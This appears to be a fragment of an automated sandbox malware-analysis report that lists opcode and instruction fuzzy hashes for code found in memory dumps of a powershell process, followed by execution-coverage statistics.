                                                                                                                                • Snapshot File: hcaresult_15_2_4d0d000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 111515dc3817c4cd72232505478eeebc261cf9335113f3e22b312c3b5fc1905e
                                                                                                                                • Instruction ID: b64d4542b10e0735901f8ce7bf152e6dbcb10ed00a399498325eafed813251ca
                                                                                                                                • Opcode Fuzzy Hash: 111515dc3817c4cd72232505478eeebc261cf9335113f3e22b312c3b5fc1905e
                                                                                                                                • Instruction Fuzzy Hash: 74014C6250E3C09FD7128B259894B52BFB4EF53224F19C0DBD8888F2E3C2695849C7B2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3f18eca488c7c548652be7d35688b91cc90ddeb4eb993e4cc07b33ce2c91448d
                                                                                                                                • Instruction ID: cf20def3690d4e2185af3e4f8c491a10f1ebab6bd6cd6bb60093c6eedbb50a88
                                                                                                                                • Opcode Fuzzy Hash: 3f18eca488c7c548652be7d35688b91cc90ddeb4eb993e4cc07b33ce2c91448d
                                                                                                                                • Instruction Fuzzy Hash: FBF081353193A12FD7028A799C949BB7FE9EF9662070944BBF484CB3A2C660C805C7A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ac4e29cdf19f2782cb2a9f4fae9e82383adfc982c5652fd7314f577ff4c4497
                                                                                                                                • Instruction ID: 87043af41f954d4d780f2f4fd3e3323343823b3363e92f9e43d95375b5c94b3b
                                                                                                                                • Opcode Fuzzy Hash: 7ac4e29cdf19f2782cb2a9f4fae9e82383adfc982c5652fd7314f577ff4c4497
                                                                                                                                • Instruction Fuzzy Hash: 2AF02B717013149FD7109B69D884EAF7BE5EBC8265F00062DE54AC3381DF306C0587A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1599665022.0000000004D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D0D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4d0d000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bdbf32bcaced9e34c468fdada0664aca20f605f5f8f9eb06c933a4e04ba81990
                                                                                                                                • Instruction ID: 5cb5da28ddf1459b38b19863e76189b9db0cb3d6eb707b8a489e26c4099cd341
                                                                                                                                • Opcode Fuzzy Hash: bdbf32bcaced9e34c468fdada0664aca20f605f5f8f9eb06c933a4e04ba81990
                                                                                                                                • Instruction Fuzzy Hash: 9FF0E776600600AF97248F0AD985C27FBAAEFD5770719C55AE84A4B652C671FC41CAA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3616a9fba7c87d6574d0aa1d9540dd5a093a6a77699fd10ca10c4a750be50c73
                                                                                                                                • Instruction ID: 3d6248a1518febf0a564b3c8f3055bc87329c8935ff05714190fb83f84e6b5ec
                                                                                                                                • Opcode Fuzzy Hash: 3616a9fba7c87d6574d0aa1d9540dd5a093a6a77699fd10ca10c4a750be50c73
                                                                                                                                • Instruction Fuzzy Hash: 2FF0F6317082418FE315AF74D0587AB7BA1DFC5319F1480AFD4569F386CE396846CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 25395a2d60bcaf70eee594c56c605b05c0f727bf5115fff9352d9de50cfef7fc
                                                                                                                                • Instruction ID: 986d74a144c99be65e713b6957717e711f0564e439040d3ea4f5828b97c760cc
                                                                                                                                • Opcode Fuzzy Hash: 25395a2d60bcaf70eee594c56c605b05c0f727bf5115fff9352d9de50cfef7fc
                                                                                                                                • Instruction Fuzzy Hash: 37F05E387042904FC3119B2CD894CB6BBF69FCA61931910AAE185CB372CA61DC02CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1599665022.0000000004D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D0D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4d0d000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 44116f72fe737e8140fba10b3eaa66ac171ee054395481310485a87dd7367252
                                                                                                                                • Instruction ID: f5473792a1aea7abc8f7a63da418525dd480b3ee23a35023a7ad5a50e3aaa0ee
                                                                                                                                • Opcode Fuzzy Hash: 44116f72fe737e8140fba10b3eaa66ac171ee054395481310485a87dd7367252
                                                                                                                                • Instruction Fuzzy Hash: 86F0F976104640AFD725CF06CD85D23BBBAEF95764B19C489A89A5B362C631FC42CFA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 63326622c709f6ba70ae2a0552d986c366c62ae1d23d6f17f0b7587ee97e2433
                                                                                                                                • Instruction ID: 93b8366cedfad239aeccc7d4e3a2836b405207c76581b6af5862dde37e672141
                                                                                                                                • Opcode Fuzzy Hash: 63326622c709f6ba70ae2a0552d986c366c62ae1d23d6f17f0b7587ee97e2433
                                                                                                                                • Instruction Fuzzy Hash: 52F08231700614DFD7109B5AD844AAFB7E9EBC8665B000A2DE54AC3340DF31AC0187A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c85d089c587f8b4accb48c5cbde8cbbb2d407b332561f42be5480bdeea005088
                                                                                                                                • Instruction ID: 7bdc56a33f1b4bf33cd72f6525fbdb53bfbb5e9b082c4917a2712cf74a7389f4
                                                                                                                                • Opcode Fuzzy Hash: c85d089c587f8b4accb48c5cbde8cbbb2d407b332561f42be5480bdeea005088
                                                                                                                                • Instruction Fuzzy Hash: F2F030397002148FDB14EB6D9840AAB7BE2EBCC65971545D9E909CB728DF74EC018BE1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 66151ba2e9960fd54f776079294312ae298ecccfdac0682ef355abcc159ffe12
                                                                                                                                • Instruction ID: ae79a5f7263c4995c78da61dde8be740c783b606538d894e29619aeb9b085818
                                                                                                                                • Opcode Fuzzy Hash: 66151ba2e9960fd54f776079294312ae298ecccfdac0682ef355abcc159ffe12
                                                                                                                                • Instruction Fuzzy Hash: BEF082757442048BE714BBA5D01979B7796DBC4318F10812ED90A5B385DE3A68468BE1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7d2381968cc3a3a5db510a0f4cf160cfaabf9a4fc7b33515cd2b3984fac752d1
                                                                                                                                • Instruction ID: cc58ee4bb04973c83cedd94f0812d32b4e6224bd3a92aaae069d9f2f8392e1ae
                                                                                                                                • Opcode Fuzzy Hash: 7d2381968cc3a3a5db510a0f4cf160cfaabf9a4fc7b33515cd2b3984fac752d1
                                                                                                                                • Instruction Fuzzy Hash: 3EF090706093515FD7659FB894D838ABFE0EF06310F0444AED54ACB282CB356885C750
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 25d944b83237f85a5a6304a76e6846c912e70a70a72253ef73e51389f5823385
                                                                                                                                • Instruction ID: d5af96ba8b8514c40876420ab7bd0b619cbd034e600a662d1dd66d144cf1149a
                                                                                                                                • Opcode Fuzzy Hash: 25d944b83237f85a5a6304a76e6846c912e70a70a72253ef73e51389f5823385
                                                                                                                                • Instruction Fuzzy Hash: A8F0A0313097912BC717972D9810C9F7FE5AEC256030444BED086CB293CA50D80AC7E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 854acc319df26d222ab46f44b7f8a48033cb7ac29c6e76fe4c11cd729179648b
                                                                                                                                • Instruction ID: ba6eb97273dba8a220b464274d7777d20abec9c83308bd1f4a7392620d0ee545
                                                                                                                                • Opcode Fuzzy Hash: 854acc319df26d222ab46f44b7f8a48033cb7ac29c6e76fe4c11cd729179648b
                                                                                                                                • Instruction Fuzzy Hash: 6DE0E5397002118F83149B1DD898CA6B7FAEFCEA6931910A9E589CB331DA61EC01CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c122f6d1eac6cd3f03c8050b84309ed24e5ad0af01c75be175bb85481185ec78
                                                                                                                                • Instruction ID: c98bf46dcc982e8434aaf63274b945a8ad9651c9815e9c4d80ed599f78fbea1c
                                                                                                                                • Opcode Fuzzy Hash: c122f6d1eac6cd3f03c8050b84309ed24e5ad0af01c75be175bb85481185ec78
                                                                                                                                • Instruction Fuzzy Hash: 7DE0922174A2E11A8B5762BC68505FB6ED94FC205830950FEC685CB293D844880683F2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 82ae1911a94086d8ade93f5004ccce56fe46761b0056eda1ea524fd639d98ac1
                                                                                                                                • Instruction ID: 881c1067a46cdf73c9f8791752735a2361f9c2f3195500dfcfdbab635067cbe5
                                                                                                                                • Opcode Fuzzy Hash: 82ae1911a94086d8ade93f5004ccce56fe46761b0056eda1ea524fd639d98ac1
                                                                                                                                • Instruction Fuzzy Hash: 46E0E531B100506BCB098A6CDC408EEFBA5AFC9220F04807EE4869B241CA216416D6E0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 05a2fa3894b2b29b870f350fd7ec826adb495dc06591a290821427011c5d6a58
                                                                                                                                • Instruction ID: a7f2ff84e7423b9edd1172e8ada3af0a3661ea2e0b6c3dc7671bfd2fbe21182c
                                                                                                                                • Opcode Fuzzy Hash: 05a2fa3894b2b29b870f350fd7ec826adb495dc06591a290821427011c5d6a58
                                                                                                                                • Instruction Fuzzy Hash: 1BF0A73030C2915BC71A77B4A4185AE7FA19FC5224F04007FD556CB283CF24580587D2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5feaf40d57a107ee1d99142690770dcb9a68bee2581c938501011ee93379ccd7
                                                                                                                                • Instruction ID: 5b76142fb1a0d2fc146e0828c6fffd73b7a6a7fe1d262a82fa0a40ca570fa5b4
                                                                                                                                • Opcode Fuzzy Hash: 5feaf40d57a107ee1d99142690770dcb9a68bee2581c938501011ee93379ccd7
                                                                                                                                • Instruction Fuzzy Hash: 90F06D70A043048BD360EFB8D49C79ABBE5EB44320F40442DD64EC7381DB356880CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 09ba9c31d6a0e436f07b90b141dab88f94bc81b19a77700d29c3a2dfb0983f38
                                                                                                                                • Instruction ID: 8b1c60bbdd19a31033d74b3f75838221a799a17a418f4be7930679e68d5702be
                                                                                                                                • Opcode Fuzzy Hash: 09ba9c31d6a0e436f07b90b141dab88f94bc81b19a77700d29c3a2dfb0983f38
                                                                                                                                • Instruction Fuzzy Hash: 89E01274D046499FC780DFFCD88219AFFF4AF09210B2080AAC949EB611E6715642CBE2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5823ca735089911f7396a12bcc90095d4bc99f4e55f9dbb22848926ed890ce3e
                                                                                                                                • Instruction ID: 141818782bcc7efdf91ffecd469b6ae2702bde2aa1a9f489bf931a128f7d3d28
                                                                                                                                • Opcode Fuzzy Hash: 5823ca735089911f7396a12bcc90095d4bc99f4e55f9dbb22848926ed890ce3e
                                                                                                                                • Instruction Fuzzy Hash: 7AE0862674D2D11A5F5B913D64A04EB5FB38AD756130A80FAD084CB242C8518C0B83D1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f9ee6475df6f12870db1ddf18045e0ae77228d56c0c20c46c887c98df0d93d33
                                                                                                                                • Instruction ID: 2870d819ad9820a7bcc00f16e9b00ed61554f288c515aaf2f432fd3e85ac0974
                                                                                                                                • Opcode Fuzzy Hash: f9ee6475df6f12870db1ddf18045e0ae77228d56c0c20c46c887c98df0d93d33
                                                                                                                                • Instruction Fuzzy Hash: CBE0263130821087CB0877B8A40C6AEBA56EBC4738F00002ED61787382CF39680183E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 20477b45c72e1d72ce89a485c1baf5a99ff82700a610264f0946298b359f0966
                                                                                                                                • Instruction ID: d4728136b9501407afaa7d00d4b5fbeb183fabb120f8924a2ffb386c27f259e4
                                                                                                                                • Opcode Fuzzy Hash: 20477b45c72e1d72ce89a485c1baf5a99ff82700a610264f0946298b359f0966
                                                                                                                                • Instruction Fuzzy Hash: 73D0A712B42221175A5572FE6840AFBA5CE9FC54AD7056036DB89C3342EC44EC0243F1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                • Instruction ID: 7910c113fc34935322fac2cffc34ac91708c6a8067edf1e3ec62018f236a7562
                                                                                                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                • Instruction Fuzzy Hash: 88E08631B1001497CB089959D8108EDF7AADBCC220F04807ED94AA7340DA32691586E1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b0539619af95b9b5c19f267841e03d7cf61c6f3f6239efb4e0b489a4c3a2fe91
                                                                                                                                • Instruction ID: de5bc94925ebcccc9d294db02b1e08981369e25f529a6b3662e5a95c546434cb
                                                                                                                                • Opcode Fuzzy Hash: b0539619af95b9b5c19f267841e03d7cf61c6f3f6239efb4e0b489a4c3a2fe91
                                                                                                                                • Instruction Fuzzy Hash: 13E0C231700714178716A75EA9018DFB7DAEFC4975310843EE44AC7340DF60EC058BE5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d45d45335f72e5b65d8fee799b8c07d47bb714a109c4dd02873b60b0e0a3a558
                                                                                                                                • Instruction ID: 162e9b0880f19e43c6068dd02f98d25b9b127808c7cc2b4ad56eb82e42b0b00d
                                                                                                                                • Opcode Fuzzy Hash: d45d45335f72e5b65d8fee799b8c07d47bb714a109c4dd02873b60b0e0a3a558
                                                                                                                                • Instruction Fuzzy Hash: E5E0ED30A48286AACB59EFB8D44686FBFB0AB45214B0441BDE94ADB287D6215846DBC1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: feb5e3de944101e1cd2cbca3980cdb8f4af553154d1e2bf374e04ea4daeaa6bc
                                                                                                                                • Instruction ID: aba2ad302c7e25e7bd0bef47020acf1c7f1a373a3d2e9a44047e4d5ba1717cd2
                                                                                                                                • Opcode Fuzzy Hash: feb5e3de944101e1cd2cbca3980cdb8f4af553154d1e2bf374e04ea4daeaa6bc
                                                                                                                                • Instruction Fuzzy Hash: 4CE04F31E080468BCB0EBBF4D8994FEBF70EE15301B4001ADD95397592EA22198ACBC0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                • Instruction ID: e81ccda844d710e52af62cef054c2c48fc860a9c9604e2a0da821abc31fdff06
                                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                • Instruction Fuzzy Hash: D8D06270D042099F8B80DFADC9415AEFBF4EB48200F5085AA8919E7311F73156128BD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 30453a5342bad4b1f2d6f3307f9485c440a7a456d9a68eb4f2b0181a018084a4
                                                                                                                                • Instruction ID: a53c82a61d199210fa0b817141823b360b7b40458f847b6f8fc059f461f4b3c1
                                                                                                                                • Opcode Fuzzy Hash: 30453a5342bad4b1f2d6f3307f9485c440a7a456d9a68eb4f2b0181a018084a4
                                                                                                                                • Instruction Fuzzy Hash: A9D017308081098BCB1CBBA4E81A4FEBB34FB00301F4001ADDA1792291EA322A4ACBC0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ce83772f75d5afe5f3abedd2eeb62432b94b962c7c61201fa527f32f8a779e3e
                                                                                                                                • Instruction ID: c4027de64060e793febc63c2700bbfa60696241d193a71490d10e4ede316084f
                                                                                                                                • Opcode Fuzzy Hash: ce83772f75d5afe5f3abedd2eeb62432b94b962c7c61201fa527f32f8a779e3e
                                                                                                                                • Instruction Fuzzy Hash: 67D01234A0820A9BCB18FFA4D44686EBBB4E744304F004169DA4A93345EA306C01CFC1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ba4790bfe91e9cb285cef387e737ebabffa6664bd75bcab06959d993a787fb13
                                                                                                                                • Instruction ID: a85e003e9f644bd6351d175656177bbdfb1b98688f7603664c34b24763033615
                                                                                                                                • Opcode Fuzzy Hash: ba4790bfe91e9cb285cef387e737ebabffa6664bd75bcab06959d993a787fb13
                                                                                                                                • Instruction Fuzzy Hash: 1BD01274448388DBDB266F74A4D49153F506B12251F0405EDDC560A293D9378849CF00
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8bfb5a0f3720e911c82b15d1463827d1cb65230c47d980bfff44d99ad5e7ed37
                                                                                                                                • Instruction ID: 0ba3246f91b98f66623dd102615588d1de252658ba3f3b5d0afb8ff9d6c3f304
                                                                                                                                • Opcode Fuzzy Hash: 8bfb5a0f3720e911c82b15d1463827d1cb65230c47d980bfff44d99ad5e7ed37
                                                                                                                                • Instruction Fuzzy Hash: D1C02B7150E1008FEF08A73148643337E321B83300F5280ECC28182C90CE304409DF01
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 010afa75846c8428741beb6a1a0a54650e68917689ea9fd9da77749ce982855b
                                                                                                                                • Instruction ID: b507f52a6df8fbb5df52170f75df4b84ddfa02a374324d098afad4695f2364f0
                                                                                                                                • Opcode Fuzzy Hash: 010afa75846c8428741beb6a1a0a54650e68917689ea9fd9da77749ce982855b
                                                                                                                                • Instruction Fuzzy Hash: 77B09230048708CFC2486FB5A444815732DAB4121638004A8E81E0A3928E3BEC85CA54

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.5%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:303
                                                                                                                                Total number of Limit Nodes:28
